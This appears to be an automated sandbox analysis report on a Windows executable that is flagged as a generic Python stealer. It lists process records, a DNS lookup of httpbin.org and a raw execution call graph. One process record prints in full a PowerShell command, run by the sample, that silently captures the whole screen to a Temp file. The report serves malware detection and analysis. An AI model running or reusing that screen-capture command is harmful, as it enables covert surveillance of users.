                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.637696028 CET1.1.1.1192.168.2.110xd30aNo error (0)httpbin.org34.224.200.202A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:03:57:21
                                                                                                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MkWMm5piE5.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MkWMm5piE5.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7fbdc0000
                                                                                                                                                                                                                                                                        File size:17'155'097 bytes
                                                                                                                                                                                                                                                                        MD5 hash:05D551D9E91E59CFA28C7D7B2A5E2374
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                        Start time:03:57:24
                                                                                                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MkWMm5piE5.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MkWMm5piE5.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7fbdc0000
                                                                                                                                                                                                                                                                        File size:17'155'097 bytes
                                                                                                                                                                                                                                                                        MD5 hash:05D551D9E91E59CFA28C7D7B2A5E2374
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                        Start time:03:57:25
                                                                                                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:powershell -Command " Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Drawing $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height $graphics = [System.Drawing.Graphics]::FromImage($bitmap) $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size) $bitmap.Save(\"C:\Users\user\AppData\Local\Temp\desktop_screenshot.png\") "
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6eb350000
                                                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                        Start time:03:57:25
                                                                                                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:9.6%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                          Signature Coverage:13%
                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:29
                                                                                                                                                                                                                                                                          execution_graph 15376 7ff7fbdcc07c 15397 7ff7fbdcc24c 15376->15397 15379 7ff7fbdcc1c8 15493 7ff7fbdcc57c IsProcessorFeaturePresent 15379->15493 15380 7ff7fbdcc098 __scrt_acquire_startup_lock 15382 7ff7fbdcc1d2 15380->15382 15389 7ff7fbdcc0b6 __scrt_release_startup_lock 15380->15389 15383 7ff7fbdcc57c 7 API calls 15382->15383 15385 7ff7fbdcc1dd __CxxCallCatchBlock 15383->15385 15384 7ff7fbdcc0db 15386 7ff7fbdcc161 15403 7ff7fbdcc6c8 15386->15403 15388 7ff7fbdcc166 15406 7ff7fbdc1000 15388->15406 15389->15384 15389->15386 15482 7ff7fbdda0bc 15389->15482 15394 7ff7fbdcc189 15394->15385 15489 7ff7fbdcc3e0 15394->15489 15500 7ff7fbdcc84c 15397->15500 15400 7ff7fbdcc090 15400->15379 15400->15380 15401 7ff7fbdcc27b __scrt_initialize_crt 15401->15400 15502 7ff7fbdcd998 15401->15502 15529 7ff7fbdcd0e0 15403->15529 15407 7ff7fbdc100b 15406->15407 15531 7ff7fbdc86b0 15407->15531 15409 7ff7fbdc101d 15538 7ff7fbdd5ef8 15409->15538 15411 7ff7fbdc39cb 15545 7ff7fbdc1eb0 15411->15545 15415 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15416 7ff7fbdc3ae6 15415->15416 15487 7ff7fbdcc70c GetModuleHandleW 15416->15487 15417 7ff7fbdc39ea 15478 7ff7fbdc3ad2 15417->15478 15561 7ff7fbdc7b60 15417->15561 15419 7ff7fbdc3a1f 15420 7ff7fbdc7b60 61 API calls 15419->15420 15433 7ff7fbdc3a6b 15419->15433 15422 7ff7fbdc3a40 __std_exception_copy 15420->15422 15430 7ff7fbdc8040 58 API calls 15422->15430 15422->15433 15423 7ff7fbdc3a80 15580 7ff7fbdc1cb0 15423->15580 15426 7ff7fbdc3b71 15428 7ff7fbdc3b95 15426->15428 15599 7ff7fbdc14f0 15426->15599 15427 7ff7fbdc1cb0 121 API calls 15429 7ff7fbdc3ab6 15427->15429 15435 7ff7fbdc3bef 15428->15435 15428->15478 15606 7ff7fbdc8ae0 15428->15606 15431 7ff7fbdc3aba 15429->15431 15432 7ff7fbdc3af8 15429->15432 15430->15433 15661 7ff7fbdc2b30 15431->15661 15432->15426 15674 7ff7fbdc3fd0 15432->15674 15576 7ff7fbdc8040 15433->15576 15620 7ff7fbdc6de0 15435->15620 15437 7ff7fbdc3bcc 15440 7ff7fbdc3be2 SetDllDirectoryW 15437->15440 15441 7ff7fbdc3bd1 15437->15441 15440->15435 15444 7ff7fbdc2b30 59 API calls 15441->15444 15444->15478 15447 7ff7fbdc3b16 15450 7ff7fbdc2b30 59 API calls 15447->15450 15448 7ff7fbdc3c09 15474 7ff7fbdc3c3b 15448->15474 15706 7ff7fbdc65f0 15448->15706 15450->15478 15451 7ff7fbdc3d06 15624 7ff7fbdc34c0 15451->15624 15452 7ff7fbdc3b44 15452->15426 15453 7ff7fbdc3b49 15452->15453 15693 7ff7fbdd018c 15453->15693 15459 7ff7fbdc3c5a 15467 7ff7fbdc3ca5 15459->15467 15748 7ff7fbdc1ef0 15459->15748 15460 7ff7fbdc3c3d 15742 7ff7fbdc6840 15460->15742 15466 7ff7fbdc3d2e 15469 7ff7fbdc7b60 61 API calls 15466->15469 15467->15478 15752 7ff7fbdc3460 15467->15752 15468 7ff7fbdc3c2c 15736 7ff7fbdc6c30 15468->15736 15472 7ff7fbdc3d3a 15469->15472 15638 7ff7fbdc8080 15472->15638 15473 7ff7fbdc3ce1 15476 7ff7fbdc6840 FreeLibrary 15473->15476 15474->15451 15474->15459 15476->15478 15478->15415 15483 7ff7fbdda0f4 15482->15483 15484 7ff7fbdda0d3 15482->15484 18282 7ff7fbdda968 15483->18282 15484->15386 15488 7ff7fbdcc71d 15487->15488 15488->15394 15491 7ff7fbdcc3f1 15489->15491 15490 7ff7fbdcc1a0 15490->15384 15491->15490 15492 7ff7fbdcd998 __scrt_initialize_crt 7 API calls 15491->15492 15492->15490 15494 7ff7fbdcc5a2 _wfindfirst32i64 memcpy_s 15493->15494 15495 7ff7fbdcc5c1 RtlCaptureContext RtlLookupFunctionEntry 15494->15495 15496 7ff7fbdcc626 memcpy_s 15495->15496 15497 7ff7fbdcc5ea RtlVirtualUnwind 15495->15497 15498 7ff7fbdcc658 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15496->15498 15497->15496 15499 7ff7fbdcc6aa _wfindfirst32i64 15498->15499 15499->15382 15501 7ff7fbdcc26e __scrt_dllmain_crt_thread_attach 15500->15501 15501->15400 15501->15401 15503 7ff7fbdcd9a0 15502->15503 15504 7ff7fbdcd9aa 15502->15504 15508 7ff7fbdcdd14 15503->15508 15504->15400 15509 7ff7fbdcdd23 15508->15509 15510 7ff7fbdcd9a5 15508->15510 15516 7ff7fbdcdf50 15509->15516 15512 7ff7fbdcdd80 15510->15512 15513 7ff7fbdcddab 15512->15513 15514 7ff7fbdcddaf 15513->15514 15515 7ff7fbdcdd8e DeleteCriticalSection 15513->15515 15514->15504 15515->15513 15520 7ff7fbdcddb8 15516->15520 15521 7ff7fbdcddfc __vcrt_FlsAlloc 15520->15521 15527 7ff7fbdcded2 TlsFree 15520->15527 15522 7ff7fbdcde2a LoadLibraryExW 15521->15522 15523 7ff7fbdcdec1 GetProcAddress 15521->15523 15521->15527 15528 7ff7fbdcde6d LoadLibraryExW 15521->15528 15524 7ff7fbdcdea1 15522->15524 15525 7ff7fbdcde4b GetLastError 15522->15525 15523->15527 15524->15523 15526 7ff7fbdcdeb8 FreeLibrary 15524->15526 15525->15521 15526->15523 15528->15521 15528->15524 15530 7ff7fbdcc6df GetStartupInfoW 15529->15530 15530->15388 15533 7ff7fbdc86cf 15531->15533 15532 7ff7fbdc8720 WideCharToMultiByte 15532->15533 15536 7ff7fbdc87c6 15532->15536 15533->15532 15535 7ff7fbdc8774 WideCharToMultiByte 15533->15535 15533->15536 15537 7ff7fbdc86d7 __std_exception_copy 15533->15537 15535->15533 15535->15536 15800 7ff7fbdc29e0 15536->15800 15537->15409 15541 7ff7fbde0050 15538->15541 15539 7ff7fbde00a3 15540 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15539->15540 15544 7ff7fbde00cc 15540->15544 15541->15539 15542 7ff7fbde00f6 15541->15542 16190 7ff7fbddff28 15542->16190 15544->15411 15546 7ff7fbdc1ec5 15545->15546 15547 7ff7fbdc1ee0 15546->15547 16198 7ff7fbdc2890 15546->16198 15547->15478 15549 7ff7fbdc3ec0 15547->15549 15550 7ff7fbdcbc60 15549->15550 15551 7ff7fbdc3ecc GetModuleFileNameW 15550->15551 15552 7ff7fbdc3f12 15551->15552 15553 7ff7fbdc3efb 15551->15553 16238 7ff7fbdc8bf0 15552->16238 15554 7ff7fbdc29e0 57 API calls 15553->15554 15556 7ff7fbdc3f0e 15554->15556 15559 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15556->15559 15558 7ff7fbdc2b30 59 API calls 15558->15556 15560 7ff7fbdc3f4f 15559->15560 15560->15417 15562 7ff7fbdc7b6a 15561->15562 15563 7ff7fbdc8ae0 57 API calls 15562->15563 15564 7ff7fbdc7b8c GetEnvironmentVariableW 15563->15564 15565 7ff7fbdc7bf6 15564->15565 15566 7ff7fbdc7ba4 ExpandEnvironmentStringsW 15564->15566 15567 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15565->15567 15568 7ff7fbdc8bf0 59 API calls 15566->15568 15569 7ff7fbdc7c08 15567->15569 15570 7ff7fbdc7bcc 15568->15570 15569->15419 15570->15565 15571 7ff7fbdc7bd6 15570->15571 16249 7ff7fbdda99c 15571->16249 15574 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15575 7ff7fbdc7bee 15574->15575 15575->15419 15577 7ff7fbdc8ae0 57 API calls 15576->15577 15578 7ff7fbdc8057 SetEnvironmentVariableW 15577->15578 15579 7ff7fbdc806f __std_exception_copy 15578->15579 15579->15423 15581 7ff7fbdc1cbe 15580->15581 15582 7ff7fbdc1ef0 49 API calls 15581->15582 15583 7ff7fbdc1cf4 15582->15583 15584 7ff7fbdc1dde 15583->15584 15585 7ff7fbdc1ef0 49 API calls 15583->15585 15587 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15584->15587 15586 7ff7fbdc1d1a 15585->15586 15586->15584 16256 7ff7fbdc1aa0 15586->16256 15588 7ff7fbdc1e6c 15587->15588 15588->15426 15588->15427 15592 7ff7fbdc1dcc 15593 7ff7fbdc3e40 49 API calls 15592->15593 15593->15584 15594 7ff7fbdc1d8f 15594->15592 15595 7ff7fbdc1e34 15594->15595 15596 7ff7fbdc3e40 49 API calls 15595->15596 15597 7ff7fbdc1e41 15596->15597 16292 7ff7fbdc4050 15597->16292 15600 7ff7fbdc157f 15599->15600 15601 7ff7fbdc1506 15599->15601 15600->15428 16334 7ff7fbdc7950 15601->16334 15604 7ff7fbdc2b30 59 API calls 15605 7ff7fbdc1564 15604->15605 15605->15428 15607 7ff7fbdc8b01 MultiByteToWideChar 15606->15607 15608 7ff7fbdc8b87 MultiByteToWideChar 15606->15608 15611 7ff7fbdc8b4c 15607->15611 15612 7ff7fbdc8b27 15607->15612 15609 7ff7fbdc8bcf 15608->15609 15610 7ff7fbdc8baa 15608->15610 15609->15437 15613 7ff7fbdc29e0 55 API calls 15610->15613 15611->15608 15617 7ff7fbdc8b62 15611->15617 15614 7ff7fbdc29e0 55 API calls 15612->15614 15615 7ff7fbdc8bbd 15613->15615 15616 7ff7fbdc8b3a 15614->15616 15615->15437 15616->15437 15618 7ff7fbdc29e0 55 API calls 15617->15618 15619 7ff7fbdc8b75 15618->15619 15619->15437 15621 7ff7fbdc6df5 15620->15621 15622 7ff7fbdc3bf4 15621->15622 15623 7ff7fbdc2890 59 API calls 15621->15623 15622->15474 15697 7ff7fbdc6a90 15622->15697 15623->15622 15625 7ff7fbdc3574 15624->15625 15629 7ff7fbdc3533 15624->15629 15626 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15625->15626 15627 7ff7fbdc35c5 15626->15627 15627->15478 15631 7ff7fbdc7fd0 15627->15631 15629->15625 16876 7ff7fbdc1710 15629->16876 16918 7ff7fbdc2d70 15629->16918 15632 7ff7fbdc8ae0 57 API calls 15631->15632 15633 7ff7fbdc7fef 15632->15633 15634 7ff7fbdc8ae0 57 API calls 15633->15634 15635 7ff7fbdc7fff 15634->15635 15636 7ff7fbdd7dec 38 API calls 15635->15636 15637 7ff7fbdc800d __std_exception_copy 15636->15637 15637->15466 15639 7ff7fbdc8090 15638->15639 15640 7ff7fbdc8ae0 57 API calls 15639->15640 15641 7ff7fbdc80c1 SetConsoleCtrlHandler GetStartupInfoW 15640->15641 15642 7ff7fbdc8122 15641->15642 17407 7ff7fbddaa14 15642->17407 15646 7ff7fbdc8131 15647 7ff7fbddaa14 _fread_nolock 37 API calls 15646->15647 15662 7ff7fbdc2b50 15661->15662 15663 7ff7fbdd4ac4 49 API calls 15662->15663 15664 7ff7fbdc2b9b memcpy_s 15663->15664 15665 7ff7fbdc8ae0 57 API calls 15664->15665 15666 7ff7fbdc2bd0 15665->15666 15667 7ff7fbdc2bd5 15666->15667 15668 7ff7fbdc2c0d MessageBoxA 15666->15668 15669 7ff7fbdc8ae0 57 API calls 15667->15669 15670 7ff7fbdc2c27 15668->15670 15671 7ff7fbdc2bef MessageBoxW 15669->15671 15672 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15670->15672 15671->15670 15673 7ff7fbdc2c37 15672->15673 15673->15478 15675 7ff7fbdc3fdc 15674->15675 15676 7ff7fbdc8ae0 57 API calls 15675->15676 15677 7ff7fbdc4007 15676->15677 15678 7ff7fbdc8ae0 57 API calls 15677->15678 15679 7ff7fbdc401a 15678->15679 17425 7ff7fbdd64a8 15679->17425 15682 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15683 7ff7fbdc3b0e 15682->15683 15683->15447 15684 7ff7fbdc82b0 15683->15684 15685 7ff7fbdc82d4 15684->15685 15686 7ff7fbdd0814 73 API calls 15685->15686 15691 7ff7fbdc83ab __std_exception_copy 15685->15691 15687 7ff7fbdc82ee 15686->15687 15687->15691 17804 7ff7fbdd9070 15687->17804 15689 7ff7fbdd0814 73 API calls 15692 7ff7fbdc8303 15689->15692 15690 7ff7fbdd04dc _fread_nolock 53 API calls 15690->15692 15691->15452 15692->15689 15692->15690 15692->15691 15694 7ff7fbdd01bc 15693->15694 17819 7ff7fbdcff68 15694->17819 15696 7ff7fbdd01d5 15696->15447 15698 7ff7fbdc6ab3 15697->15698 15699 7ff7fbdc6aca 15697->15699 15698->15699 17830 7ff7fbdc15a0 15698->17830 15699->15448 15701 7ff7fbdc6ad4 15701->15699 15702 7ff7fbdc4050 49 API calls 15701->15702 15703 7ff7fbdc6b35 15702->15703 15704 7ff7fbdc2b30 59 API calls 15703->15704 15705 7ff7fbdc6ba5 __std_exception_copy memcpy_s 15703->15705 15704->15699 15705->15448 15720 7ff7fbdc660a memcpy_s 15706->15720 15708 7ff7fbdc672f 15710 7ff7fbdc4050 49 API calls 15708->15710 15709 7ff7fbdc674b 15712 7ff7fbdc2b30 59 API calls 15709->15712 15711 7ff7fbdc67a8 15710->15711 15715 7ff7fbdc4050 49 API calls 15711->15715 15716 7ff7fbdc6741 __std_exception_copy 15712->15716 15713 7ff7fbdc4050 49 API calls 15713->15720 15714 7ff7fbdc6710 15714->15708 15717 7ff7fbdc4050 49 API calls 15714->15717 15718 7ff7fbdc67d8 15715->15718 15719 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15716->15719 15717->15708 15722 7ff7fbdc4050 49 API calls 15718->15722 15721 7ff7fbdc3c1a 15719->15721 15720->15708 15720->15709 15720->15713 15720->15714 15720->15720 15723 7ff7fbdc1710 144 API calls 15720->15723 15724 7ff7fbdc6731 15720->15724 17854 7ff7fbdc1950 15720->17854 15721->15460 15726 7ff7fbdc6570 15721->15726 15722->15716 15723->15720 15725 7ff7fbdc2b30 59 API calls 15724->15725 15725->15716 17858 7ff7fbdc8260 15726->17858 15728 7ff7fbdc658c 15729 7ff7fbdc8260 58 API calls 15728->15729 15730 7ff7fbdc659f 15729->15730 15731 7ff7fbdc65d5 15730->15731 15733 7ff7fbdc65b7 15730->15733 15732 7ff7fbdc2b30 59 API calls 15731->15732 15735 7ff7fbdc3c28 15732->15735 17862 7ff7fbdc6ef0 GetProcAddress 15733->17862 15735->15460 15735->15468 15737 7ff7fbdc6c54 15736->15737 15738 7ff7fbdc2b30 59 API calls 15737->15738 15741 7ff7fbdc6cca 15737->15741 15739 7ff7fbdc6cae 15738->15739 15740 7ff7fbdc6840 FreeLibrary 15739->15740 15740->15741 15741->15474 15746 7ff7fbdc687d 15742->15746 15747 7ff7fbdc6852 15742->15747 15743 7ff7fbdc693b 15743->15746 17922 7ff7fbdc8240 FreeLibrary 15743->17922 15746->15474 15747->15743 15747->15746 17921 7ff7fbdc8240 FreeLibrary 15747->17921 15749 7ff7fbdc1f15 15748->15749 15750 7ff7fbdd4ac4 49 API calls 15749->15750 15751 7ff7fbdc1f38 15750->15751 15751->15467 17923 7ff7fbdc5bc0 15752->17923 15755 7ff7fbdc34ad 15755->15473 15757 7ff7fbdc3484 15757->15755 17992 7ff7fbdc5920 15757->17992 15759 7ff7fbdc3490 15759->15755 18001 7ff7fbdc5a90 15759->18001 15819 7ff7fbdcbc60 15800->15819 15803 7ff7fbdc2a29 15821 7ff7fbdd4ac4 15803->15821 15808 7ff7fbdc1ef0 49 API calls 15809 7ff7fbdc2a86 memcpy_s 15808->15809 15810 7ff7fbdc8ae0 54 API calls 15809->15810 15811 7ff7fbdc2abb 15810->15811 15812 7ff7fbdc2ac0 15811->15812 15813 7ff7fbdc2af8 MessageBoxA 15811->15813 15814 7ff7fbdc8ae0 54 API calls 15812->15814 15815 7ff7fbdc2b12 15813->15815 15816 7ff7fbdc2ada MessageBoxW 15814->15816 15817 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15815->15817 15816->15815 15818 7ff7fbdc2b22 15817->15818 15818->15537 15820 7ff7fbdc29fc GetLastError 15819->15820 15820->15803 15825 7ff7fbdd4b1e 15821->15825 15822 7ff7fbdd4b43 15823 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15822->15823 15828 7ff7fbdd4b6d 15823->15828 15824 7ff7fbdd4b7f 15851 7ff7fbdd2d50 15824->15851 15825->15822 15825->15824 15827 7ff7fbdd4c5c 15830 7ff7fbddaf0c __free_lconv_num 11 API calls 15827->15830 15829 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15828->15829 15832 7ff7fbdc2a57 15829->15832 15830->15828 15839 7ff7fbdc8560 15832->15839 15833 7ff7fbdd4c80 15833->15827 15835 7ff7fbdd4c8a 15833->15835 15834 7ff7fbdd4c31 15836 7ff7fbddaf0c __free_lconv_num 11 API calls 15834->15836 15838 7ff7fbddaf0c __free_lconv_num 11 API calls 15835->15838 15836->15828 15837 7ff7fbdd4c28 15837->15827 15837->15834 15838->15828 15840 7ff7fbdc856c 15839->15840 15841 7ff7fbdc858d FormatMessageW 15840->15841 15842 7ff7fbdc8587 GetLastError 15840->15842 15843 7ff7fbdc85c0 15841->15843 15844 7ff7fbdc85dc WideCharToMultiByte 15841->15844 15842->15841 15845 7ff7fbdc29e0 54 API calls 15843->15845 15846 7ff7fbdc8616 15844->15846 15847 7ff7fbdc85d3 15844->15847 15845->15847 15848 7ff7fbdc29e0 54 API calls 15846->15848 15849 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15847->15849 15848->15847 15850 7ff7fbdc2a5e 15849->15850 15850->15808 15852 7ff7fbdd2d8e 15851->15852 15853 7ff7fbdd2d7e 15851->15853 15854 7ff7fbdd2d97 15852->15854 15861 7ff7fbdd2dc5 15852->15861 15855 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15853->15855 15856 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15854->15856 15857 7ff7fbdd2dbd 15855->15857 15856->15857 15857->15827 15857->15833 15857->15834 15857->15837 15860 7ff7fbdd3074 15863 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15860->15863 15861->15853 15861->15857 15861->15860 15865 7ff7fbdd36e0 15861->15865 15891 7ff7fbdd33a8 15861->15891 15921 7ff7fbdd2c30 15861->15921 15924 7ff7fbdd4900 15861->15924 15863->15853 15866 7ff7fbdd3795 15865->15866 15867 7ff7fbdd3722 15865->15867 15870 7ff7fbdd37ef 15866->15870 15871 7ff7fbdd379a 15866->15871 15868 7ff7fbdd37bf 15867->15868 15869 7ff7fbdd3728 15867->15869 15948 7ff7fbdd1c90 15868->15948 15876 7ff7fbdd372d 15869->15876 15879 7ff7fbdd37fe 15869->15879 15870->15868 15870->15879 15889 7ff7fbdd3758 15870->15889 15872 7ff7fbdd37cf 15871->15872 15873 7ff7fbdd379c 15871->15873 15955 7ff7fbdd1880 15872->15955 15875 7ff7fbdd373d 15873->15875 15882 7ff7fbdd37ab 15873->15882 15890 7ff7fbdd382d 15875->15890 15930 7ff7fbdd4044 15875->15930 15876->15875 15880 7ff7fbdd3770 15876->15880 15876->15889 15879->15890 15962 7ff7fbdd20a0 15879->15962 15880->15890 15940 7ff7fbdd4500 15880->15940 15882->15868 15883 7ff7fbdd37b0 15882->15883 15883->15890 15944 7ff7fbdd4698 15883->15944 15885 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15887 7ff7fbdd3ac3 15885->15887 15887->15861 15889->15890 15969 7ff7fbddee18 15889->15969 15890->15885 15892 7ff7fbdd33b3 15891->15892 15893 7ff7fbdd33c9 15891->15893 15894 7ff7fbdd3407 15892->15894 15896 7ff7fbdd3795 15892->15896 15897 7ff7fbdd3722 15892->15897 15893->15894 15895 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15893->15895 15894->15861 15895->15894 15900 7ff7fbdd379a 15896->15900 15906 7ff7fbdd37ef 15896->15906 15898 7ff7fbdd37bf 15897->15898 15899 7ff7fbdd3728 15897->15899 15901 7ff7fbdd1c90 38 API calls 15898->15901 15902 7ff7fbdd372d 15899->15902 15907 7ff7fbdd37fe 15899->15907 15903 7ff7fbdd37cf 15900->15903 15905 7ff7fbdd379c 15900->15905 15919 7ff7fbdd3758 15901->15919 15904 7ff7fbdd373d 15902->15904 15910 7ff7fbdd3770 15902->15910 15902->15919 15908 7ff7fbdd1880 38 API calls 15903->15908 15909 7ff7fbdd4044 47 API calls 15904->15909 15920 7ff7fbdd382d 15904->15920 15905->15904 15912 7ff7fbdd37ab 15905->15912 15906->15898 15906->15907 15906->15919 15911 7ff7fbdd20a0 38 API calls 15907->15911 15907->15920 15908->15919 15909->15919 15913 7ff7fbdd4500 47 API calls 15910->15913 15910->15920 15911->15919 15912->15898 15914 7ff7fbdd37b0 15912->15914 15913->15919 15916 7ff7fbdd4698 37 API calls 15914->15916 15914->15920 15915 7ff7fbdcbcc0 _wfindfirst32i64 8 API calls 15917 7ff7fbdd3ac3 15915->15917 15916->15919 15917->15861 15918 7ff7fbddee18 47 API calls 15918->15919 15919->15918 15919->15920 15920->15915 16118 7ff7fbdd0e54 15921->16118 15925 7ff7fbdd4917 15924->15925 16135 7ff7fbdddf78 15925->16135 15931 7ff7fbdd4066 15930->15931 15979 7ff7fbdd0cc0 15931->15979 15936 7ff7fbdd4900 45 API calls 15938 7ff7fbdd41a3 15936->15938 15937 7ff7fbdd4900 45 API calls 15939 7ff7fbdd422c 15937->15939 15938->15937 15938->15938 15938->15939 15939->15889 15941 7ff7fbdd4518 15940->15941 15943 7ff7fbdd4580 15940->15943 15942 7ff7fbddee18 47 API calls 15941->15942 15941->15943 15942->15943 15943->15889 15947 7ff7fbdd46b9 15944->15947 15945 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15946 7ff7fbdd46ea 15945->15946 15946->15889 15947->15945 15947->15946 15949 7ff7fbdd1cc3 15948->15949 15950 7ff7fbdd1cf2 15949->15950 15952 7ff7fbdd1daf 15949->15952 15951 7ff7fbdd0cc0 12 API calls 15950->15951 15954 7ff7fbdd1d2f 15950->15954 15951->15954 15953 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15952->15953 15953->15954 15954->15889 15956 7ff7fbdd18b3 15955->15956 15957 7ff7fbdd18e2 15956->15957 15960 7ff7fbdd199f 15956->15960 15958 7ff7fbdd191f 15957->15958 15959 7ff7fbdd0cc0 12 API calls 15957->15959 15958->15889 15959->15958 15961 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15960->15961 15961->15958 15963 7ff7fbdd20d3 15962->15963 15964 7ff7fbdd2102 15963->15964 15966 7ff7fbdd21bf 15963->15966 15965 7ff7fbdd0cc0 12 API calls 15964->15965 15968 7ff7fbdd213f 15964->15968 15965->15968 15967 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15966->15967 15967->15968 15968->15889 15971 7ff7fbddee40 15969->15971 15970 7ff7fbddee85 15974 7ff7fbddee6e memcpy_s 15970->15974 15978 7ff7fbddee45 memcpy_s 15970->15978 16115 7ff7fbde04c8 15970->16115 15971->15970 15972 7ff7fbdd4900 45 API calls 15971->15972 15971->15974 15971->15978 15972->15970 15973 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15973->15978 15974->15973 15974->15978 15978->15889 15980 7ff7fbdd0cf7 15979->15980 15985 7ff7fbdd0ce6 15979->15985 15981 7ff7fbdddbbc _fread_nolock 12 API calls 15980->15981 15980->15985 15982 7ff7fbdd0d24 15981->15982 15984 7ff7fbddaf0c __free_lconv_num 11 API calls 15982->15984 15986 7ff7fbdd0d38 15982->15986 15983 7ff7fbddaf0c __free_lconv_num 11 API calls 15983->15985 15984->15986 15987 7ff7fbddeb30 15985->15987 15986->15983 15988 7ff7fbddeb80 15987->15988 15989 7ff7fbddeb4d 15987->15989 15988->15989 15991 7ff7fbddebb2 15988->15991 15990 7ff7fbddadd8 _invalid_parameter_noinfo 37 API calls 15989->15990 15999 7ff7fbdd4181 15990->15999 15994 7ff7fbddecc5 15991->15994 16004 7ff7fbddebfa 15991->16004 15992 7ff7fbddedb7 16042 7ff7fbdde01c 15992->16042 15994->15992 15995 7ff7fbdded7d 15994->15995 15996 7ff7fbdded4c 15994->15996 15998 7ff7fbdded0f 15994->15998 16001 7ff7fbdded05 15994->16001 16035 7ff7fbdde3b4 15995->16035 16028 7ff7fbdde694 15996->16028 16018 7ff7fbdde8c4 15998->16018 15999->15936 15999->15938 16001->15995 16003 7ff7fbdded0a 16001->16003 16003->15996 16003->15998 16004->15999 